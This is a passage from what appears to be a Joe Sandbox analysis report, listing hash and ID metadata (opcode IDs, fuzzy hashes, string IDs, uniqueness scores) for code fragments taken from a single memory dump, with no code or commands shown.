                            • Instruction Fuzzy Hash: 3AF01434A049198FDBE4EB28D495B6873E2EB59311F5441D9900DD7656CA349D868B40
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Strings
                            Memory Dump Source
                            • Source File: 00000004.00000002.374556125.00007FFF7E400000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF7E400000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_4_2_7fff7e400000_34432.jbxd
                            Similarity
                            • API ID:
                            • String ID: Xz.~
                            • API String ID: 0-3391176896
                            • Opcode ID: 23de654445ea5f2c7ad9e8e79e09522b007acb104ca2081fcdafcb565b2870ce
                            • Instruction ID: 6b5d6a3e891e4e093b81f70834e4f97b42a25005af45b891594f960fed66963e
                            • Opcode Fuzzy Hash: 23de654445ea5f2c7ad9e8e79e09522b007acb104ca2081fcdafcb565b2870ce
                            • Instruction Fuzzy Hash: 49D05E01B18A0F0BD4586B5C305917863D2FBC8211E90017AE40ED37C3DC1A6C43024A
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Strings
                            Memory Dump Source
                            • Source File: 00000004.00000002.374556125.00007FFF7E400000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF7E400000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_4_2_7fff7e400000_34432.jbxd
                            Similarity
                            • API ID:
                            • String ID: `W.~
                            • API String ID: 0-3475719485
                            • Opcode ID: 2626cca4b7d137d494568b232ff6a5f4924d705b4b02890ec9f628200d7ba809
                            • Instruction ID: f9f04d1fc2cba07feabf6a3bf4dcf5aeb6b60ad2448795eac2a8e3f8d3aae39e
                            • Opcode Fuzzy Hash: 2626cca4b7d137d494568b232ff6a5f4924d705b4b02890ec9f628200d7ba809
                            • Instruction Fuzzy Hash: 7AD01205714A0D4A9694BA2C51D86E9A3C1EB58255780157B944BC3993DD59B4470780
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Strings
                            Memory Dump Source
                            • Source File: 00000004.00000002.374556125.00007FFF7E400000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF7E400000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_4_2_7fff7e400000_34432.jbxd
                            Similarity
                            • API ID:
                            • String ID: #6^_^
                            • API String ID: 0-3410500413
                            • Opcode ID: 99d74f04fbea49d1f56d4c40b2058768555da7ebafa3ec1a988860f702233b99
                            • Instruction ID: 022a1151f057f3a61f362c48d864c46a1428d091c2b59645e8d8963018bb39fd
                            • Opcode Fuzzy Hash: 99d74f04fbea49d1f56d4c40b2058768555da7ebafa3ec1a988860f702233b99
                            • Instruction Fuzzy Hash: EFA012112348060A32C87654001823900C2AB94050B204436540EC328ADC14C8030101
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Strings
                            Memory Dump Source
                            • Source File: 00000004.00000002.374556125.00007FFF7E400000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF7E400000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_4_2_7fff7e400000_34432.jbxd
                            Similarity
                            • API ID:
                            • String ID: @{.~
                            • API String ID: 0-1582192007
                            • Opcode ID: e068bfbd7b3f1f2f23dc5d96689fa9e373e1d8cf32405d0443821bc7204a5899
                            • Instruction ID: 342fa6a8328d3ca6b3d25310f4da3a4d53b2eb3ffdeb3ee0825fe400e404311a
                            • Opcode Fuzzy Hash: e068bfbd7b3f1f2f23dc5d96689fa9e373e1d8cf32405d0443821bc7204a5899
                            • Instruction Fuzzy Hash: D7A01210A0041807E1547514802C37440C19754300F4101B9440AC21C1EC080C120202
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Strings
                            Memory Dump Source
                            • Source File: 00000004.00000002.374556125.00007FFF7E400000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF7E400000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_4_2_7fff7e400000_34432.jbxd
                            Similarity
                            • API ID:
                            • String ID: 5^_^
                            • API String ID: 0-424247050
                            • Opcode ID: 59f3f045b74f13425f0f248cbb02249409e2c596ade1468d9c4985d23b44bd0e
                            • Instruction ID: 0e6963878779a38f15b0276dbacbb52cec8a5d133b6eeba6cb830fa62225f130
                            • Opcode Fuzzy Hash: 59f3f045b74f13425f0f248cbb02249409e2c596ade1468d9c4985d23b44bd0e
                            • Instruction Fuzzy Hash: 75A0120823C80E1B31C571D4008952054C1574411074040311809C1183DC2498010A08
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Memory Dump Source
                            • Source File: 00000004.00000002.374556125.00007FFF7E400000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF7E400000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_4_2_7fff7e400000_34432.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 89c60ab921a3c0a59af351550069b0778c27856f4f3f6317edb53f2279af432e
                            • Instruction ID: e2fdadb12288013abd110207689162408e1cbfbd5a09b6db1335ac541bef43c8
                            • Opcode Fuzzy Hash: 89c60ab921a3c0a59af351550069b0778c27856f4f3f6317edb53f2279af432e
                            • Instruction Fuzzy Hash: 9531A732A185190BD75CBE2894565B977D2EB84700B21417FD40BDB296DD38AC4287C1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Memory Dump Source
                            • Source File: 00000004.00000002.374556125.00007FFF7E400000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF7E400000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_4_2_7fff7e400000_34432.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 38aafd3dc40e6d76344177985d6036cf74560bbe8ede6b6bd764a5b2821c1815
                            • Instruction ID: bcc925e523ad34a25f075e65cd6e82b0830a30203e72bcc43dc3678fbda919bb
                            • Opcode Fuzzy Hash: 38aafd3dc40e6d76344177985d6036cf74560bbe8ede6b6bd764a5b2821c1815
                            • Instruction Fuzzy Hash: BD11043370C5091FA72C9C69AC4A477B38BD3C6230B51D33FE597C26AAED69A81341C8
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Memory Dump Source
                            • Source File: 00000004.00000002.374556125.00007FFF7E400000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF7E400000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_4_2_7fff7e400000_34432.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 0559878e2a9a53c0c09775af1481b0e2c7e59071f3b50d6a06b7cd24a99afe67
                            • Instruction ID: ac2621f893b7d137e3c9c38de4e4345084df5f09439b96e347d9b23986894f6c
                            • Opcode Fuzzy Hash: 0559878e2a9a53c0c09775af1481b0e2c7e59071f3b50d6a06b7cd24a99afe67
                            • Instruction Fuzzy Hash: 88112B3650C2454FD31DDA758C5A8A27BA5EB4322031A42EEE486C71A3E5689C078795
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Memory Dump Source
                            • Source File: 00000004.00000002.374556125.00007FFF7E400000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF7E400000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_4_2_7fff7e400000_34432.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 1e61c5e27af741d13534bf87260edc7de1fdc372a2aa1c7c7bed62de012e3cf9
                            • Instruction ID: 5e9cbe06091fe067a1e4b20661a440c21a83b851af63a9f08c8e65c693271d21
                            • Opcode Fuzzy Hash: 1e61c5e27af741d13534bf87260edc7de1fdc372a2aa1c7c7bed62de012e3cf9
                            • Instruction Fuzzy Hash: C6213736A4864B8FE711EFA8D8855EDB7F0EF40324F00047BD145DF292DE3AA5468781
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Memory Dump Source
                            • Source File: 00000004.00000002.374556125.00007FFF7E400000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF7E400000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_4_2_7fff7e400000_34432.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 15f2132819d5197cf3aef81ebfdf9a887af98e62543b68965ae2bbd93df405d5
                            • Instruction ID: f8db68442854d25a1216279b02fc1cad92243ba4c67bbaa7ec8e5aef2a219786
                            • Opcode Fuzzy Hash: 15f2132819d5197cf3aef81ebfdf9a887af98e62543b68965ae2bbd93df405d5
                            • Instruction Fuzzy Hash: 14219632A1C51A0BEB5CBF68849A5BDB6D2EF84310B5406BFD40FCB2D2DD2CAD424781
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Memory Dump Source
                            • Source File: 00000004.00000002.374556125.00007FFF7E400000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF7E400000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_4_2_7fff7e400000_34432.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: f230f4b76b49c48c9986d2e92897c0b6c1433d3f03fdea162e1cec662cd5ea91
                            • Instruction ID: 66b2b4f7260a8a01b4d66f0acd5a8fbbc37d99ab509e1f71eb476b324d9e5c51
                            • Opcode Fuzzy Hash: f230f4b76b49c48c9986d2e92897c0b6c1433d3f03fdea162e1cec662cd5ea91
                            • Instruction Fuzzy Hash: E611C43660891D8FEB98FF5CE4855ECB3E1FF68311700027BD10AC7261DE28AC428B80
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Memory Dump Source
                            • Source File: 00000004.00000002.374556125.00007FFF7E400000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF7E400000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_4_2_7fff7e400000_34432.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 8343d88576ef2dbb86f804377aff0b6e6681efcc66ff0bb6653193cd2a85cf34
                            • Instruction ID: 5f019123d50ea5b08534900412d19da3a50c9fd76073a59feec5365934eb81a8
                            • Opcode Fuzzy Hash: 8343d88576ef2dbb86f804377aff0b6e6681efcc66ff0bb6653193cd2a85cf34
                            • Instruction Fuzzy Hash: BD01F73360C10D1FA21CE86AAC4B8B6B39AE742230761527FF487C26A3FC55AC1341C4
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Memory Dump Source
                            • Source File: 00000004.00000002.374556125.00007FFF7E400000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF7E400000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_4_2_7fff7e400000_34432.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: d4bfd5e5520cc983bab9136e6d8858bad50730d40c2208afd6b205b467ddccbe
                            • Instruction ID: 9ea50b3f7ff5182ac37a9a62566a8043fea9887e22a059e6561002221b858dec
                            • Opcode Fuzzy Hash: d4bfd5e5520cc983bab9136e6d8858bad50730d40c2208afd6b205b467ddccbe
                            • Instruction Fuzzy Hash: 7D11843162C6424FD31DDA14C4E297AB7E2EF96301B2485BEE487871D7D928F842C796
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Memory Dump Source
                            • Source File: 00000004.00000002.374556125.00007FFF7E400000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF7E400000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_4_2_7fff7e400000_34432.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: cb69a460e40993ed827f989ef279c86a854d51e47bf62846bd9c4f9312f59cf0
                            • Instruction ID: bee0ef560ed8227ffb206ebb01d55f12681a1c5a6850f66e668f8d03f450d13d
                            • Opcode Fuzzy Hash: cb69a460e40993ed827f989ef279c86a854d51e47bf62846bd9c4f9312f59cf0
                            • Instruction Fuzzy Hash: 5E1182307285058FE74CEF2CC595A3973E6FB88310B208579E44BC77A6DE38E8428781
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Memory Dump Source
                            • Source File: 00000004.00000002.374556125.00007FFF7E400000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF7E400000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_4_2_7fff7e400000_34432.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: d31bff61aa7b2276a5f0ecbfd4b73da0d838d01f6008494a704691c8ad23bd7d
                            • Instruction ID: 56aba5bab82882662e8f207baf80ee1a0cf023d17159e717f24866c1d57c9b46
                            • Opcode Fuzzy Hash: d31bff61aa7b2276a5f0ecbfd4b73da0d838d01f6008494a704691c8ad23bd7d
                            • Instruction Fuzzy Hash: 4F1173306287058FC74CDE08C4E597AB7E2FBD9305B24597DE48787295CA34F882CB82
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Memory Dump Source
                            • Source File: 00000004.00000002.374556125.00007FFF7E400000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF7E400000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_4_2_7fff7e400000_34432.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 3f2863c2dd2901aa6252152acc86e03d6d96caf6e6878d67d22273a4008c62a9
                            • Instruction ID: 9a5917940b085e3352ee9530080afb8a8b71873fcbb2c22597777a984cca5cb4
                            • Opcode Fuzzy Hash: 3f2863c2dd2901aa6252152acc86e03d6d96caf6e6878d67d22273a4008c62a9
                            • Instruction Fuzzy Hash: 6711047AE4854B8BDB11DF58D8954FEB7F1FF84314F0005B6E10A9B281DE396A148781
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Memory Dump Source
                            • Source File: 00000004.00000002.374556125.00007FFF7E400000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF7E400000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_4_2_7fff7e400000_34432.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: efe540dd443df57c19b7598a5828a2f76702ea0647eabbd0ee0223b1362823a7
                            • Instruction ID: f5d0f3cef1e5c7852e7a5ecb3398ccafc3fda2e00e932e033d711bf02e061738
                            • Opcode Fuzzy Hash: efe540dd443df57c19b7598a5828a2f76702ea0647eabbd0ee0223b1362823a7
                            • Instruction Fuzzy Hash: AF015225B2C54A4FDB58EE2984D953DB6C2FF98201B1544BFE44FCB292DD2DE8415701
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Memory Dump Source
                            • Source File: 00000004.00000002.374556125.00007FFF7E400000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF7E400000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_4_2_7fff7e400000_34432.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: a4598a03431ca8e7e0b02c27dc40870ff456f682caf0c87f8616ad4b5ad477ff
                            • Instruction ID: a27f2952b568d4926482cf40b07c28b15046dd5e910f2547244592bf85d66995
                            • Opcode Fuzzy Hash: a4598a03431ca8e7e0b02c27dc40870ff456f682caf0c87f8616ad4b5ad477ff
                            • Instruction Fuzzy Hash: 1F01DE3654EBC60FC7469B3488650A57FF1EF9722031942EFD082CB1E3EA18680AC792
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Memory Dump Source
                            • Source File: 00000004.00000002.374556125.00007FFF7E400000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF7E400000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_4_2_7fff7e400000_34432.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: c6bca204cb1d38a9022989450edc610c908b6c328876b5ef9c216a1061a44256
                            • Instruction ID: a36c5fb62de50430e4d706ef13ff687a80c2eee5dafb60ce1ec445db0a60ce2f
                            • Opcode Fuzzy Hash: c6bca204cb1d38a9022989450edc610c908b6c328876b5ef9c216a1061a44256
                            • Instruction Fuzzy Hash: 1401A2317282064F871CDA2D849146AB2E7F7C9704720D67FE08BC73DADE38E9068A85
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Memory Dump Source
                            • Source File: 00000004.00000002.374556125.00007FFF7E400000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF7E400000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_4_2_7fff7e400000_34432.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 7b061972f6124144d0a47a9e68828f261cd79473a09a3554478786670fa4c784
                            • Instruction ID: 09ba4f20cab33ddbcf2bf74c6d490ed9fc1bcb5f49d5b3f30016d2a6784537af
                            • Opcode Fuzzy Hash: 7b061972f6124144d0a47a9e68828f261cd79473a09a3554478786670fa4c784
                            • Instruction Fuzzy Hash: 8101B131A2C9068BD758DF18C591979B3E1FB8C300F10417EE84BC7291EE68AC428787
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Memory Dump Source
                            • Source File: 00000004.00000002.374556125.00007FFF7E400000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF7E400000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_4_2_7fff7e400000_34432.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 51816aae39425f9c728f9615ef8bcd7d456cbe74071001ff182e4ee798d92c77
                            • Instruction ID: 24f72fdcebd38ce8a613b679ac470a5196e5cf5bd79e08e18c77eba6ab15adab
                            • Opcode Fuzzy Hash: 51816aae39425f9c728f9615ef8bcd7d456cbe74071001ff182e4ee798d92c77
                            • Instruction Fuzzy Hash: EA011260A187894FEB45FBAC805577CBBE2EF58304F5401BAE04DD72E7DD289842475A
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Memory Dump Source
                            • Source File: 00000004.00000002.374556125.00007FFF7E400000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF7E400000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_4_2_7fff7e400000_34432.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 9571279cdd33223a6b3b8eb57cf421e51dc7cdd0b3dbf3bc92e9a909b5639e6c
                            • Instruction ID: 4ce4eab791c93e4e5a1abbaf292f04bdf665662488cc56cb9eb7c0ca9c1be1d1
                            • Opcode Fuzzy Hash: 9571279cdd33223a6b3b8eb57cf421e51dc7cdd0b3dbf3bc92e9a909b5639e6c
                            • Instruction Fuzzy Hash: F3F0C2307286459FD78CEF6CC096A3977E1FB49704B50547DE44BC72A5DE24EC428B42
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Memory Dump Source
                            • Source File: 00000004.00000002.374556125.00007FFF7E400000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF7E400000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_4_2_7fff7e400000_34432.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 9ef02e817e8926cb0b1dd87ed2124f6cd1ae5df1fc8d306334100e0bb10bacde
                            • Instruction ID: 7991db39b2e80918ce577ad9db34e65c3da842dee942f36fe44c5e1853132379
                            • Opcode Fuzzy Hash: 9ef02e817e8926cb0b1dd87ed2124f6cd1ae5df1fc8d306334100e0bb10bacde
                            • Instruction Fuzzy Hash: 1AF0593271480A0BC758D9298C984BB73D6EBD4331750037BE007C72E4DD6925428780
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Memory Dump Source
                            • Source File: 00000004.00000002.374556125.00007FFF7E400000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF7E400000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_4_2_7fff7e400000_34432.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 1e056a740a3a56b5d24019b50528065ba3033e4aa40cb3fd263e5d466ec279a7
                            • Instruction ID: 131aa128157d91a60f00d0a5901d21bca30298338e258a8823d9218f14ad66c4
                            • Opcode Fuzzy Hash: 1e056a740a3a56b5d24019b50528065ba3033e4aa40cb3fd263e5d466ec279a7
                            • Instruction Fuzzy Hash: B7F0F43112C7820FD70EAB2484A24BAB7E1EF96214B2044BFD087875D3D918F8168782
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Memory Dump Source
                            • Source File: 00000004.00000002.374556125.00007FFF7E400000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF7E400000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_4_2_7fff7e400000_34432.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 1f45a5cbc1549b9502d2c138f2ca22f288a429d1908dc8e4669e096c5d141357
                            • Instruction ID: 9b6e3f912d7c113b60cc54c4b9fc8eed7fe5acf39703fecb7333584d365b36be
                            • Opcode Fuzzy Hash: 1f45a5cbc1549b9502d2c138f2ca22f288a429d1908dc8e4669e096c5d141357
                            • Instruction Fuzzy Hash: 94F0B4317293074B870CEA298599075B2DAD795705760A67EF0C7C62D6DD3CE8434985
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Memory Dump Source
                            • Source File: 00000004.00000002.374556125.00007FFF7E400000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF7E400000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_4_2_7fff7e400000_34432.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 4fb2842d77864b880db140a77096da963df749c3ef870ecbe0a63eeaf057485c
                            • Instruction ID: 33c105b2854b5f0b2848bb8c9b8e47a24681fc0ab8f953954ee850dc3721fb1f
                            • Opcode Fuzzy Hash: 4fb2842d77864b880db140a77096da963df749c3ef870ecbe0a63eeaf057485c
                            • Instruction Fuzzy Hash: 0CF0F637B185474BEB5CDD25C8521A9B3D3EBC0360B55823BD1178B1D2ED38A8439680
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Memory Dump Source
                            • Source File: 00000004.00000002.374556125.00007FFF7E400000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF7E400000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_4_2_7fff7e400000_34432.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 5f5e95ac5a6a80f1f0039d0d324655f659f86e4cd26d58c7221330463fd7f815
                            • Instruction ID: 6d3ea7862ff68b4e60f9d23d54bf5be8b91da2fe040821b03182b4c8df12a72a
                            • Opcode Fuzzy Hash: 5f5e95ac5a6a80f1f0039d0d324655f659f86e4cd26d58c7221330463fd7f815
                            • Instruction Fuzzy Hash: 72F0F627F0811B4BF718ED64C4959A9B3E3EB50350B1407BBD117867D0FD6DBA464280
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Memory Dump Source
                            • Source File: 00000004.00000002.374556125.00007FFF7E400000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF7E400000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_4_2_7fff7e400000_34432.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 64b7b42e76ea806cfa8c0a645dd3c9ad4d95f19c6b3dc94c756e909642edff88
                            • Instruction ID: 823ecb2fa61a43defc9d74a9e3771c7289ca4e2cb8183d71175011acefe8bbf6
                            • Opcode Fuzzy Hash: 64b7b42e76ea806cfa8c0a645dd3c9ad4d95f19c6b3dc94c756e909642edff88
                            • Instruction Fuzzy Hash: C4F02736B28A024BD70CAD2D99940757297E7C9315724C27EE14BC73EACC3CE8178684
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Memory Dump Source
                            • Source File: 00000004.00000002.374556125.00007FFF7E400000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF7E400000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_4_2_7fff7e400000_34432.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 493d838fab978d52c0ed10593e9c0a8b355be30c7cd68ea9bf136289c16d2240
                            • Instruction ID: c0fa8d99904357c6cca430583209a889914093beb5ac235149d78f34146796fe
                            • Opcode Fuzzy Hash: 493d838fab978d52c0ed10593e9c0a8b355be30c7cd68ea9bf136289c16d2240
                            • Instruction Fuzzy Hash: 9FF0A7325A82174BC71CDD6989C7174B2CAD715701700427ED9C387296FC14691745CB
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Memory Dump Source
                            • Source File: 00000004.00000002.374556125.00007FFF7E400000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF7E400000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_4_2_7fff7e400000_34432.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: ea035584f801474ae0e9c26192f5d9897a910503daaecbeffb30b52b4644c388
                            • Instruction ID: 18b4f7ff5a8d6f1848048a111241bb68243c0c4e9dc24c81ca283e95b40294d6
                            • Opcode Fuzzy Hash: ea035584f801474ae0e9c26192f5d9897a910503daaecbeffb30b52b4644c388
                            • Instruction Fuzzy Hash: 92016D75E5464A8BDB01DF64C9855EEB7F1FF44300F004566E505E7240DE386A148B92
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Memory Dump Source
                            • Source File: 00000004.00000002.374556125.00007FFF7E400000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF7E400000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_4_2_7fff7e400000_34432.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: c25c8fb46a183e1af5b3735cd361c061063203c8ae2c86488fb1bafea6010e89
                            • Instruction ID: c08b25b879e3a5bd647f8ed289f7d4e7a5018afed07a63c4d31cce9b2f33be90
                            • Opcode Fuzzy Hash: c25c8fb46a183e1af5b3735cd361c061063203c8ae2c86488fb1bafea6010e89
                            • Instruction Fuzzy Hash: 19F0823164880A8FDB0CEE1CC595D6D73E6EF6930070542BAD807DB2B0DE28EC818BC1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Memory Dump Source
                            • Source File: 00000004.00000002.374556125.00007FFF7E400000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF7E400000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_4_2_7fff7e400000_34432.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 033ae9118721b047852e158711c62bbd89861c4eebf45aefb4f63a62afe2e998
                            • Instruction ID: 7218854bccef59a0b35c6701c16e42d752160333357a57725719114ca77d14ec
                            • Opcode Fuzzy Hash: 033ae9118721b047852e158711c62bbd89861c4eebf45aefb4f63a62afe2e998
                            • Instruction Fuzzy Hash: 0FF0F639B5860B8BD31BDD29C480565F2E3AB84350B10897ED107C77D9EE7CB8858640
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Memory Dump Source
                            • Source File: 00000004.00000002.374556125.00007FFF7E400000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF7E400000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_4_2_7fff7e400000_34432.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: f60395af6489ee105c1b005d705bd781bc2518a5dab19d4a3f058063c1d6b7d4
                            • Instruction ID: afb2a0cf7529dfcbfd4c88de757fc57a807373cb0619bcc96df5305e8d011dc5
                            • Opcode Fuzzy Hash: f60395af6489ee105c1b005d705bd781bc2518a5dab19d4a3f058063c1d6b7d4
                            • Instruction Fuzzy Hash: A5E01221B158190FE694F73D64456A9B5D2EBCC21175601F6E40EC3296DD289C828781
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Memory Dump Source
                            • Source File: 00000004.00000002.374556125.00007FFF7E400000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF7E400000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_4_2_7fff7e400000_34432.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 735187cb4c2cd721fcf8802c77a17787d3eb1aeb8dadf0bc8b16b73f993427e1
                            • Instruction ID: b77c3904896bedf7dee714e1be318fbc58fb0c0d09abca9cb69f6a6c0c1dbf18
                            • Opcode Fuzzy Hash: 735187cb4c2cd721fcf8802c77a17787d3eb1aeb8dadf0bc8b16b73f993427e1
                            • Instruction Fuzzy Hash: D1F0F871B6CA018BD744AB1D9585929B7E1EB9C705F1040BAF88EC7296DE28EC428A47
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Memory Dump Source
                            • Source File: 00000004.00000002.374556125.00007FFF7E400000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF7E400000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_4_2_7fff7e400000_34432.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: a41143180313269df11d11109604c9858e673766f8cb936fc93820ba65fe1b89
                            • Instruction ID: 6a381de19334403e97f971204179007af6bf9a8b01d0a483ff31a718316522f2
